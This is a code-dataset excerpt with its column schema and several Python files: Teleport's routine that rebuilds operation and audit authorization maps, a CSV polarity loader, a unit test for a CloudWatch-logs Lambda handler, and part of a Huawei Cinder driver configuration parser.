hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a1e2f745b1c09777ad708383a909a606bf11d79 | 23,608 | py | Python | server/www/teleport/webroot/app/model/policy.py | tinygg/teleport | 5ac759c707d355767a209e29becaadf250b0e366 | [
"Apache-2.0"
] | 640 | 2018-09-12T03:14:13.000Z | 2022-03-30T04:38:09.000Z | server/www/teleport/webroot/app/model/policy.py | tinygg/teleport | 5ac759c707d355767a209e29becaadf250b0e366 | [
"Apache-2.0"
] | 175 | 2018-09-10T19:52:20.000Z | 2022-03-30T04:37:30.000Z | server/www/teleport/webroot/app/model/policy.py | tinygg/teleport | 5ac759c707d355767a209e29becaadf250b0e366 | [
"Apache-2.0"
] | 230 | 2018-09-13T02:40:49.000Z | 2022-03-29T11:53:58.000Z | # -*- coding: utf-8 -*-
from app.const import *
from app.base.logger import log
from app.base.db import get_db, SQL
from app.model import syslog
from app.base.utils import AttrDict, tp_timestamp_sec
def rebuild_ops_auz_map():
_users = {}
_hosts = {}
_accs = {}
_gusers = {}
_ghosts = {}
_gaccs = {}
_groups = {}
_policies = {}
_p_users = {}
_p_assets = {}
_map = []
db = get_db()
dbtp = db.table_prefix
db.exec('DELETE FROM {}ops_map'.format(dbtp))
s = SQL(get_db())
# 加载所有策略
err = s.reset().select_from('ops_policy', ['id', 'rank', 'state'], alt_name='p').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_policies[i.id] = i
# 加载所有的用户
err = s.reset().select_from('user', ['id', 'username', 'surname', 'state'], alt_name='u').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_users[i.id] = i
# 加载所有的主机
err = s.reset().select_from('host', ['id', 'name', 'ip', 'router_ip', 'router_port', 'state'], alt_name='h').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_hosts[i.id] = i
# 加载所有的账号
err = s.reset().select_from('acc', ['id', 'host_id', 'username', 'protocol_type', 'protocol_port', 'auth_type', 'state'], alt_name='a').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_accs[i.id] = i
# 加载所有的组
err = s.reset().select_from('group', ['id', 'type', 'state'], alt_name='g').query()
if err != TPE_OK:
return err
for i in s.recorder:
_groups[i.id] = i
if i.type == TP_GROUP_USER:
_gusers[i.id] = []
elif i.type == TP_GROUP_HOST:
_ghosts[i.id] = []
elif i.type == TP_GROUP_ACCOUNT:
_gaccs[i.id] = []
# 加载所有的组
err = s.reset().select_from('group_map', ['id', 'type', 'gid', 'mid'], alt_name='g').query()
if err != TPE_OK:
return err
for g in s.recorder:
if g.type == TP_GROUP_USER:
# if g.gid not in _gusers:
# _gusers[g.gid] = []
_gusers[g.gid].append(_users[g.mid])
elif g.type == TP_GROUP_HOST:
# if g.gid not in _ghosts:
# _ghosts[g.gid] = []
_ghosts[g.gid].append(_hosts[g.mid])
elif g.type == TP_GROUP_ACCOUNT:
# if g.gid not in _gaccs:
# _gaccs[g.gid] = []
_gaccs[g.gid].append(_accs[g.mid])
# 加载所有策略明细
err = s.reset().select_from('ops_auz', ['id', 'policy_id', 'type', 'rtype', 'rid'], alt_name='o').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
# 分解各个策略中操作者和被操作资产的信息
for i in s.recorder:
if i.type == TP_POLICY_OPERATOR:
if i.policy_id not in _p_users:
_p_users[i.policy_id] = []
if i.rtype == TP_USER:
u = _users[i.rid]
_p_users[i.policy_id].append({
'u_id': i.rid,
'u_state': u.state,
'gu_id': 0,
'gu_state': 0,
'u_name': u.username,
'u_surname': u.surname,
'auth_from_': 'USER'
})
elif i.rtype == TP_GROUP_USER:
for u in _gusers[i.rid]:
_p_users[i.policy_id].append({
'u_id': u.id,
'u_state': u.state,
'gu_id': i.rid,
'gu_state': _groups[i.rid].state,
'u_name': u.username,
'u_surname': u.surname,
'auth_from_': 'gUSER'
})
else:
log.e('invalid operator type.\n')
return TPE_FAILED
elif i.type == TP_POLICY_ASSET:
if i.policy_id not in _p_assets:
_p_assets[i.policy_id] = []
if i.rtype == TP_ACCOUNT:
a = _accs[i.rid]
h = _hosts[a.host_id]
_p_assets[i.policy_id].append({
'a_id': i.rid,
'a_state': a.state,
'ga_id': 0,
'ga_state': 0,
'h_id': h.id,
'h_state': h.state,
'gh_id': 0,
'gh_state': 0,
'a_name': a.username,
'protocol_type': a.protocol_type,
'protocol_port': a.protocol_port,
'h_name': h.name,
'ip': h.ip,
'router_ip': h.router_ip,
'router_port': h.router_port,
'auth_to_': 'ACC'
})
elif i.rtype == TP_GROUP_ACCOUNT:
for a in _gaccs[i.rid]:
h = _hosts[a.host_id]
_p_assets[i.policy_id].append({
'a_id': a.id,
'a_state': a.state,
'ga_id': i.rid,
'ga_state': _groups[i.rid].state,
'h_id': h.id,
'h_state': h.state,
'gh_id': 0,
'gh_state': 0,
'a_name': a.username,
'protocol_type': a.protocol_type,
'protocol_port': a.protocol_port,
'h_name': h.name,
'ip': h.ip,
'router_ip': h.router_ip,
'router_port': h.router_port,
'auth_to_': 'gACC'
})
elif i.rtype == TP_HOST:
for aid in _accs:
if _accs[aid].host_id == i.rid:
a = _accs[aid]
h = _hosts[i.rid]
_p_assets[i.policy_id].append({
'a_id': aid,
'a_state': a.state,
'ga_id': 0,
'ga_state': 0,
'h_id': h.id,
'h_state': h.state,
'gh_id': 0,
'gh_state': 0,
'a_name': a.username,
'protocol_type': a.protocol_type,
'protocol_port': a.protocol_port,
'h_name': h.name,
'ip': h.ip,
'router_ip': h.router_ip,
'router_port': h.router_port,
'auth_to_': 'HOST'
})
elif i.rtype == TP_GROUP_HOST:
for h in _ghosts[i.rid]:
for aid in _accs:
if _accs[aid].host_id == h.id:
a = _accs[aid]
_p_assets[i.policy_id].append({
'a_id': aid,
'a_state': a.state,
'ga_id': 0,
'ga_state': 0,
'h_id': h.id,
'h_state': h.state,
'gh_id': i.rid,
'gh_state': _groups[i.rid].state,
'a_name': a.username,
'protocol_type': a.protocol_type,
'protocol_port': a.protocol_port,
'h_name': h.name,
'ip': h.ip,
'router_ip': h.router_ip,
'router_port': h.router_port,
'auth_to_': 'gHOST'
})
else:
log.e('invalid asset type.\n')
return TPE_FAILED
else:
return TPE_FAILED
# 3. 建立所有一一对应的映射关系
for pid in _policies:
if pid not in _p_users:
continue
for u in _p_users[pid]:
if pid not in _p_assets:
continue
for a in _p_assets[pid]:
x = AttrDict()
x.update({
'p_id': pid,
'p_rank': _policies[pid].rank,
'p_state': _policies[pid].state
})
x.update(u)
x.update(a)
x.uni_id = '{}-{}-{}-{}-{}-{}-{}'.format(x.p_id, x.gu_id, x.u_id, x.gh_id, x.h_id, x.ga_id, x.a_id)
x.ua_id = 'u{}-a{}'.format(x.u_id, x.a_id)
x.policy_auth_type = TP_POLICY_AUTH_UNKNOWN
if u['auth_from_'] == 'USER' and a['auth_to_'] == 'ACC':
x.policy_auth_type = TP_POLICY_AUTH_USER_ACC
elif u['auth_from_'] == 'USER' and a['auth_to_'] == 'gACC':
x.policy_auth_type = TP_POLICY_AUTH_USER_gACC
elif u['auth_from_'] == 'USER' and a['auth_to_'] == 'HOST':
x.policy_auth_type = TP_POLICY_AUTH_USER_HOST
elif u['auth_from_'] == 'USER' and a['auth_to_'] == 'gHOST':
x.policy_auth_type = TP_POLICY_AUTH_USER_gHOST
elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'ACC':
x.policy_auth_type = TP_POLICY_AUTH_gUSER_ACC
elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'gACC':
x.policy_auth_type = TP_POLICY_AUTH_gUSER_gACC
elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'HOST':
x.policy_auth_type = TP_POLICY_AUTH_gUSER_HOST
elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'gHOST':
x.policy_auth_type = TP_POLICY_AUTH_gUSER_gHOST
_map.append(x)
if len(_map) == 0:
return TPE_OK
values = []
for i in _map:
v = '("{uni_id}","{ua_id}",{p_id},{p_rank},{p_state},{policy_auth_type},{u_id},{u_state},{gu_id},{gu_state},{h_id},{h_state},{gh_id},{gh_state},{a_id},{a_state},{ga_id},{ga_state},' \
'"{u_name}","{u_surname}","{h_name}","{ip}","{router_ip}",{router_port},"{a_name}",{protocol_type},{protocol_port})' \
''.format(uni_id=i.uni_id, ua_id=i.ua_id, p_id=i.p_id, p_rank=i.p_rank, p_state=i.p_state, policy_auth_type=i.policy_auth_type,
u_id=i.u_id, u_state=i.u_state, gu_id=i.gu_id, gu_state=i.gu_state, h_id=i.h_id, h_state=i.h_state,
gh_id=i.gh_id, gh_state=i.gh_state, a_id=i.a_id, a_state=i.a_state, ga_id=i.ga_id, ga_state=i.ga_state,
u_name=i.u_name, u_surname=i.u_surname, h_name=i.h_name, ip=i.ip, router_ip=i.router_ip, router_port=i.router_port,
a_name=i.a_name, protocol_type=i.protocol_type, protocol_port=i.protocol_port)
values.append(v)
sql = 'INSERT INTO `{dbtp}ops_map` (uni_id,ua_id,p_id,p_rank,p_state,policy_auth_type,u_id,u_state,gu_id,gu_state,h_id,h_state,gh_id,gh_state,a_id,a_state,ga_id,ga_state,' \
'u_name,u_surname,h_name,ip,router_ip,router_port,a_name,protocol_type,protocol_port) VALUES \n{values};' \
''.format(dbtp=dbtp, values=',\n'.join(values))
db_ret = db.exec(sql)
if not db_ret:
return TPE_DATABASE
return TPE_OK
def rebuild_audit_auz_map():
_users = {}
_hosts = {}
# _accs = {}
_gusers = {}
_ghosts = {}
# _gaccs = {}
_groups = {}
_policies = {}
_p_users = {}
_p_assets = {}
_map = []
db = get_db()
dbtp = db.table_prefix
db.exec('DELETE FROM {}audit_map'.format(dbtp))
s = SQL(get_db())
# 加载所有策略
err = s.reset().select_from('audit_policy', ['id', 'rank', 'state'], alt_name='p').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_policies[i.id] = i
# 加载所有的用户
err = s.reset().select_from('user', ['id', 'username', 'surname', 'state'], alt_name='u').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_users[i.id] = i
# 加载所有的主机
err = s.reset().select_from('host', ['id', 'name', 'ip', 'router_ip', 'router_port', 'state'], alt_name='h').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
for i in s.recorder:
_hosts[i.id] = i
# # 加载所有的账号
# err = s.reset().select_from('acc', ['id', 'host_id', 'username', 'protocol_type', 'protocol_port', 'auth_type', 'state'], alt_name='a').query()
# if err != TPE_OK:
# return err
# if 0 == len(s.recorder):
# return TPE_OK
# for i in s.recorder:
# _accs[i.id] = i
# 加载所有的组
err = s.reset().select_from('group', ['id', 'type', 'state'], alt_name='g').query()
if err != TPE_OK:
return err
for i in s.recorder:
_groups[i.id] = i
if i.type == TP_GROUP_USER:
_gusers[i.id] = []
elif i.type == TP_GROUP_HOST:
_ghosts[i.id] = []
# elif i.type == TP_GROUP_ACCOUNT:
# _gaccs[i.id] = []
# 加载所有的组
err = s.reset().select_from('group_map', ['id', 'type', 'gid', 'mid'], alt_name='g').query()
if err != TPE_OK:
return err
for g in s.recorder:
if g.type == TP_GROUP_USER:
# if g.gid not in _gusers:
# _gusers[g.gid] = []
_gusers[g.gid].append(_users[g.mid])
elif g.type == TP_GROUP_HOST:
# if g.gid not in _ghosts:
# _ghosts[g.gid] = []
_ghosts[g.gid].append(_hosts[g.mid])
# elif g.type == TP_GROUP_ACCOUNT:
# # if g.gid not in _gaccs:
# # _gaccs[g.gid] = []
# _gaccs[g.gid].append(_accs[g.mid])
# 加载所有策略明细
err = s.reset().select_from('audit_auz', ['id', 'policy_id', 'type', 'rtype', 'rid'], alt_name='o').query()
if err != TPE_OK:
return err
if 0 == len(s.recorder):
return TPE_OK
# 分解各个策略中操作者和被操作资产的信息
for i in s.recorder:
if i.type == TP_POLICY_OPERATOR:
if i.policy_id not in _p_users:
_p_users[i.policy_id] = []
if i.rtype == TP_USER:
u = _users[i.rid]
_p_users[i.policy_id].append({
'u_id': i.rid,
'u_state': u.state,
'gu_id': 0,
'gu_state': 0,
'u_name': u.username,
'u_surname': u.surname,
'auth_from_': 'USER'
})
elif i.rtype == TP_GROUP_USER:
for u in _gusers[i.rid]:
_p_users[i.policy_id].append({
'u_id': u.id,
'u_state': u.state,
'gu_id': i.rid,
'gu_state': _groups[i.rid].state,
'u_name': u.username,
'u_surname': u.surname,
'auth_from_': 'gUSER'
})
else:
log.e('invalid operator type.\n')
return TPE_FAILED
elif i.type == TP_POLICY_ASSET:
if i.policy_id not in _p_assets:
_p_assets[i.policy_id] = []
# if i.rtype == TP_ACCOUNT:
# a = _accs[i.rid]
# h = _hosts[a.host_id]
# _p_assets[i.policy_id].append({
# 'a_id': i.rid,
# 'a_state': a.state,
# 'ga_id': 0,
# 'ga_state': 0,
# 'h_id': h.id,
# 'h_state': h.state,
# 'gh_id': 0,
# 'gh_state': 0,
# 'a_name': a.username,
# 'protocol_type': a.protocol_type,
# 'protocol_port': a.protocol_port,
# 'h_name': h.name,
# 'ip': h.ip,
# 'router_ip': h.router_ip,
# 'router_port': h.router_port,
# 'auth_to_': 'ACC'
# })
# elif i.rtype == TP_GROUP_ACCOUNT:
# for a in _gaccs[i.rid]:
# h = _hosts[a.host_id]
# _p_assets[i.policy_id].append({
# 'a_id': a.id,
# 'a_state': a.state,
# 'ga_id': i.rid,
# 'ga_state': _groups[i.rid].state,
# 'h_id': h.id,
# 'h_state': h.state,
# 'gh_id': 0,
# 'gh_state': 0,
# 'a_name': a.username,
# 'protocol_type': a.protocol_type,
# 'protocol_port': a.protocol_port,
# 'h_name': h.name,
# 'ip': h.ip,
# 'router_ip': h.router_ip,
# 'router_port': h.router_port,
# 'auth_to_': 'gACC'
# })
# el
if i.rtype == TP_HOST:
# for aid in _accs:
# if _accs[aid].host_id == i.rid:
# a = _accs[aid]
h = _hosts[i.rid]
_p_assets[i.policy_id].append({
# 'a_id': aid,
# 'a_state': a.state,
# 'ga_id': 0,
# 'ga_state': 0,
'h_id': h.id,
# 'h_state': h.state,
'gh_id': 0,
# 'gh_state': 0,
# 'a_name': a.username,
# 'protocol_type': h.protocol_type,
# 'protocol_port': h.protocol_port,
'h_name': h.name,
'ip': h.ip,
'router_ip': h.router_ip,
'router_port': h.router_port,
'auth_to_': 'HOST'
})
elif i.rtype == TP_GROUP_HOST:
for h in _ghosts[i.rid]:
# for aid in _accs:
# if _accs[aid].host_id == h.id:
# a = _accs[aid]
_p_assets[i.policy_id].append({
# 'a_id': aid,
# 'a_state': a.state,
'ga_id': 0,
'ga_state': 0,
'h_id': h.id,
# 'h_state': h.state,
'gh_id': i.rid,
# 'gh_state': _groups[i.rid].state,
# 'a_name': a.username,
# 'protocol_type': a.protocol_type,
# 'protocol_port': a.protocol_port,
'h_name': h.name,
'ip': h.ip,
'router_ip': h.router_ip,
'router_port': h.router_port,
'auth_to_': 'gHOST'
})
else:
log.e('invalid asset type.\n')
return TPE_FAILED
else:
return TPE_FAILED
# 3. 建立所有一一对应的映射关系
for pid in _policies:
if pid not in _p_users:
continue
for u in _p_users[pid]:
if pid not in _p_assets:
continue
for a in _p_assets[pid]:
x = AttrDict()
x.update({
'p_id': pid,
'p_rank': _policies[pid].rank,
'p_state': _policies[pid].state
})
x.update(u)
x.update(a)
x.uni_id = '{}-{}-{}-{}-{}'.format(x.p_id, x.gu_id, x.u_id, x.gh_id, x.h_id)
x.uh_id = 'u{}-h{}'.format(x.u_id, x.h_id)
x.policy_auth_type = TP_POLICY_AUTH_UNKNOWN
# if u['auth_from_'] == 'USER' and a['auth_to_'] == 'ACC':
# x.policy_auth_type = TP_POLICY_AUTH_USER_ACC
# elif u['auth_from_'] == 'USER' and a['auth_to_'] == 'gACC':
# x.policy_auth_type = TP_POLICY_AUTH_USER_gACC
# el
if u['auth_from_'] == 'USER' and a['auth_to_'] == 'HOST':
x.policy_auth_type = TP_POLICY_AUTH_USER_HOST
elif u['auth_from_'] == 'USER' and a['auth_to_'] == 'gHOST':
x.policy_auth_type = TP_POLICY_AUTH_USER_gHOST
# elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'ACC':
# x.policy_auth_type = TP_POLICY_AUTH_gUSER_ACC
# elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'gACC':
# x.policy_auth_type = TP_POLICY_AUTH_gUSER_gACC
elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'HOST':
x.policy_auth_type = TP_POLICY_AUTH_gUSER_HOST
elif u['auth_from_'] == 'gUSER' and a['auth_to_'] == 'gHOST':
x.policy_auth_type = TP_POLICY_AUTH_gUSER_gHOST
else:
log.w('invalid policy data.\n')
continue
_map.append(x)
if len(_map) == 0:
return TPE_OK
values = []
for i in _map:
v = '("{uni_id}","{uh_id}",{p_id},{p_rank},{p_state},{policy_auth_type},{u_id},{u_state},{gu_id},{gu_state},{h_id},{gh_id},' \
'"{u_name}","{u_surname}","{h_name}","{ip}","{router_ip}",{router_port})' \
''.format(uni_id=i.uni_id, uh_id=i.uh_id, p_id=i.p_id, p_rank=i.p_rank, p_state=i.p_state, policy_auth_type=i.policy_auth_type,
u_id=i.u_id, u_state=i.u_state, gu_id=i.gu_id, gu_state=i.gu_state, h_id=i.h_id,gh_id=i.gh_id,
u_name=i.u_name, u_surname=i.u_surname, h_name=i.h_name, ip=i.ip, router_ip=i.router_ip, router_port=i.router_port)
values.append(v)
sql = 'INSERT INTO `{dbtp}audit_map` (uni_id,uh_id,p_id,p_rank,p_state,policy_auth_type,u_id,u_state,gu_id,gu_state,h_id,gh_id,' \
'u_name,u_surname,h_name,ip,router_ip,router_port) VALUES \n{values};' \
''.format(dbtp=dbtp, values=',\n'.join(values))
db_ret = db.exec(sql)
if not db_ret:
return TPE_DATABASE
return TPE_OK
def rebuild_auz_map():
ret = rebuild_ops_auz_map()
if ret != TPE_OK:
return ret
return rebuild_audit_auz_map()
| 39.021488 | 192 | 0.432862 |
4a1e30b861e4b677179f33310783146a2cfa3ca6 | 184 | py | Python | DataLoader/_load_polarity_file.py | vd1371/CBSA | f2b3f03c91ccd9ec02c2331f43573d7d6e72fd47 | [
"MIT"
] | null | null | null | DataLoader/_load_polarity_file.py | vd1371/CBSA | f2b3f03c91ccd9ec02c2331f43573d7d6e72fd47 | [
"MIT"
] | null | null | null | DataLoader/_load_polarity_file.py | vd1371/CBSA | f2b3f03c91ccd9ec02c2331f43573d7d6e72fd47 | [
"MIT"
] | null | null | null | import os
import pandas as pd
def load_polarity_file():
df = None
if os.path.exists("./Data/Polarities.csv"):
df = pd.read_csv("./Data/Polarities.csv", index_col = 0)
return df | 18.4 | 58 | 0.701087 |
4a1e3102e54eca6489dbed7e77be1985ccff63a1 | 348 | py | Python | test/unit/test_handlers.py | Spendency/cw-logs-to-lambda | 24dcd104ddbae159f2568d0672d05731b9884504 | [
"MIT"
] | 2 | 2019-04-17T17:44:31.000Z | 2020-08-04T02:49:40.000Z | test/unit/test_handlers.py | Spendency/cw-logs-to-lambda | 24dcd104ddbae159f2568d0672d05731b9884504 | [
"MIT"
] | null | null | null | test/unit/test_handlers.py | Spendency/cw-logs-to-lambda | 24dcd104ddbae159f2568d0672d05731b9884504 | [
"MIT"
] | 1 | 2021-03-24T08:27:26.000Z | 2021-03-24T08:27:26.000Z | import pytest
import handlers
import lambdahelpers
import requests
import test_constants
def test_logs_to_lambda(mocker):
mocker.patch.object(lambdahelpers, 'send_message_array')
handlers.logs_to_lambda(test_constants.AWS_LOG_EVENT, None)
lambdahelpers.send_message_array.assert_called_with(test_constants.EXTRACTED_LOG_EVENTS_JSON)
| 26.769231 | 97 | 0.850575 |
4a1e319d1efb2ef1996f7531a9497c34260b3a08 | 22,062 | py | Python | Cinder/Wallaby/huawei_conf.py | bingyanh/OpenStack_Driver | 8c94f6f86a5ebb1e663aa73df0847cfad09d2960 | [
"Apache-2.0"
] | 14 | 2019-05-25T01:55:50.000Z | 2021-02-23T06:54:06.000Z | Cinder/Wallaby/huawei_conf.py | bingyanh/OpenStack_Driver | 8c94f6f86a5ebb1e663aa73df0847cfad09d2960 | [
"Apache-2.0"
] | 4 | 2019-12-31T08:46:30.000Z | 2021-10-30T09:27:58.000Z | Cinder/Wallaby/huawei_conf.py | bingyanh/OpenStack_Driver | 8c94f6f86a5ebb1e663aa73df0847cfad09d2960 | [
"Apache-2.0"
] | 17 | 2019-07-31T03:13:07.000Z | 2022-02-21T08:09:15.000Z | # Copyright (c) 2016 Huawei Technologies Co., Ltd.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Set Huawei private configuration into Configuration object.
For conveniently get private configuration. We parse Huawei config file
and set every property into Configuration object as an attribute.
"""
import base64
from xml.etree import ElementTree as ET
import os
import re
import six
from oslo_log import log as logging
from cinder import exception
from cinder.i18n import _
from cinder.volume.drivers.huawei import constants
LOG = logging.getLogger(__name__)
class HuaweiConf(object):
def __init__(self, conf):
self.conf = conf
self.last_modify_time = None
def update_config_value(self):
file_time = os.stat(self.conf.cinder_huawei_conf_file).st_mtime
if self.last_modify_time == file_time:
return
self.last_modify_time = file_time
tree = ET.parse(self.conf.cinder_huawei_conf_file)
xml_root = tree.getroot()
self._encode_authentication(tree, xml_root)
attr_funcs = (
self._san_address,
self._san_user,
self._san_password,
self._san_vstore,
self._san_product,
self._ssl_cert_path,
self._ssl_cert_verify,
self._iscsi_info,
self._fc_info,
self._hyper_pair_sync_speed,
self._replication_pair_sync_speed,
self._hypermetro_devices,
self._replication_devices,
self._lun_type,
self._lun_write_type,
self._lun_prefetch,
self._storage_pools,
self._force_delete_volume,
self._lun_copy_speed,
self._lun_copy_mode,
self._lun_copy_wait_interval,
self._lun_timeout,
self._get_minimum_fc_initiator,
self._hyper_enforce_multipath,
self._rollback_speed,
)
for f in attr_funcs:
f(xml_root)
def _encode_authentication(self, tree, xml_root):
name_node = xml_root.find('Storage/UserName')
pwd_node = xml_root.find('Storage/UserPassword')
vstore_node = xml_root.find('Storage/vStoreName')
need_encode = False
if name_node is not None and not name_node.text.startswith('!$$$'):
encoded = base64.b64encode(six.b(name_node.text)).decode()
name_node.text = '!$$$' + encoded
need_encode = True
if pwd_node is not None and not pwd_node.text.startswith('!$$$'):
encoded = base64.b64encode(six.b(pwd_node.text)).decode()
pwd_node.text = '!$$$' + encoded
need_encode = True
if vstore_node is not None and not vstore_node.text.startswith('!$$$'):
encoded = base64.b64encode(six.b(vstore_node.text)).decode()
vstore_node.text = '!$$$' + encoded
need_encode = True
if need_encode:
tree.write(self.conf.cinder_huawei_conf_file, 'UTF-8')
def _san_address(self, xml_root):
text = xml_root.findtext('Storage/RestURL')
if not text:
msg = _("RestURL is not configured.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
addrs = list(set([x.strip() for x in text.split(';') if x.strip()]))
setattr(self.conf, 'san_address', addrs)
def _san_user(self, xml_root):
text = xml_root.findtext('Storage/UserName')
if not text:
msg = _("UserName is not configured.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
user = base64.b64decode(six.b(text[4:])).decode()
setattr(self.conf, 'san_user', user)
def _san_password(self, xml_root):
text = xml_root.findtext('Storage/UserPassword')
if not text:
msg = _("UserPassword is not configured.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
pwd = base64.b64decode(six.b(text[4:])).decode()
setattr(self.conf, 'san_password', pwd)
def _san_vstore(self, xml_root):
vstore = None
text = xml_root.findtext('Storage/vStoreName')
if text:
vstore = base64.b64decode(six.b(text[4:])).decode()
setattr(self.conf, 'vstore_name', vstore)
def _ssl_cert_path(self, xml_root):
text = xml_root.findtext('Storage/SSLCertPath')
setattr(self.conf, 'ssl_cert_path', text)
def _ssl_cert_verify(self, xml_root):
value = False
text = xml_root.findtext('Storage/SSLCertVerify')
if text:
if text.lower() in ('true', 'false'):
value = text.lower() == 'true'
else:
msg = _("SSLCertVerify configured error.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
setattr(self.conf, 'ssl_cert_verify', value)
def _set_extra_constants_by_product(self, product):
extra_constants = {}
if product == 'Dorado':
extra_constants['QOS_SPEC_KEYS'] = (
'maxIOPS', 'maxBandWidth', 'IOType')
extra_constants['QOS_IOTYPES'] = ('2',)
extra_constants['SUPPORT_LUN_TYPES'] = ('Thin',)
extra_constants['DEFAULT_LUN_TYPE'] = 'Thin'
extra_constants['SUPPORT_CLONE_MODE'] = ('fastclone', 'luncopy')
else:
extra_constants['QOS_SPEC_KEYS'] = (
'maxIOPS', 'minIOPS', 'minBandWidth',
'maxBandWidth', 'latency', 'IOType')
extra_constants['QOS_IOTYPES'] = ('0', '1', '2')
extra_constants['SUPPORT_LUN_TYPES'] = ('Thick', 'Thin')
extra_constants['DEFAULT_LUN_TYPE'] = 'Thick'
extra_constants['SUPPORT_CLONE_MODE'] = ('luncopy',)
for k in extra_constants:
setattr(constants, k, extra_constants[k])
def _san_product(self, xml_root):
text = xml_root.findtext('Storage/Product')
if not text:
msg = _("SAN product is not configured.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
product = text.strip()
if product not in constants.VALID_PRODUCT:
msg = _("Invalid SAN product %(text)s, SAN product must be "
"in %(valid)s.") % {'text': product,
'valid': constants.VALID_PRODUCT}
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
self._set_extra_constants_by_product(product)
setattr(self.conf, 'san_product', product)
def _lun_type(self, xml_root):
lun_type = constants.DEFAULT_LUN_TYPE
text = xml_root.findtext('LUN/LUNType')
if text:
lun_type = text.strip()
if lun_type not in constants.LUN_TYPE_MAP:
msg = _("Invalid lun type %s is configured.") % lun_type
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
if lun_type not in constants.SUPPORT_LUN_TYPES:
msg = _("%(array)s array requires %(valid)s lun type, "
"but %(conf)s is specified."
) % {'array': self.conf.san_product,
'valid': constants.SUPPORT_LUN_TYPES,
'conf': lun_type}
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
setattr(self.conf, 'lun_type', constants.LUN_TYPE_MAP[lun_type])
def _lun_write_type(self, xml_root):
text = xml_root.findtext('LUN/WriteType')
if text:
write_type = text.strip()
if write_type:
setattr(self.conf, 'write_type', write_type)
def _lun_prefetch(self, xml_root):
node = xml_root.find('LUN/Prefetch')
if node is not None:
if 'Type' in node.attrib:
prefetch_type = node.attrib['Type'].strip()
setattr(self.conf, 'prefetch_type', prefetch_type)
if 'Value' in node.attrib:
prefetch_value = node.attrib['Value'].strip()
setattr(self.conf, 'prefetch_value', prefetch_value)
def _storage_pools(self, xml_root):
text = xml_root.findtext('LUN/StoragePool')
if not text:
msg = _('Storage pool is not configured.')
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
pools = set(x.strip() for x in text.split(';') if x.strip())
if not pools:
msg = _('No valid storage pool configured.')
LOG.error(msg)
raise exception.InvalidInput(msg)
setattr(self.conf, 'storage_pools', list(pools))
def _force_delete_volume(self, xml_root):
force_delete_volume = False
text = xml_root.findtext('LUN/ForceDeleteVolume')
if text:
if text.lower().strip() in ('true', 'false'):
if text.lower().strip() == 'true':
force_delete_volume = True
else:
msg = _("ForceDeleteVolume configured error, "
"ForceDeleteVolume is %s.") % text
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
setattr(self.conf, 'force_delete_volume', force_delete_volume)
def _iscsi_info(self, xml_root):
iscsi_info = {}
text = xml_root.findtext('iSCSI/DefaultTargetIP')
if text:
iscsi_info['default_target_ips'] = [
ip.strip() for ip in text.split() if ip.strip()]
initiators = {}
nodes = xml_root.findall('iSCSI/Initiator')
for node in nodes or []:
if 'Name' in node.attrib:
initiators[node.attrib['Name']] = node.attrib
if 'HostName' in node.attrib:
initiators[node.attrib['HostName']] = node.attrib
if nodes and not initiators:
msg = _("Name or HostName must be set one")
LOG.error(msg)
raise exception.InvalidInput(msg)
iscsi_info['initiators'] = initiators
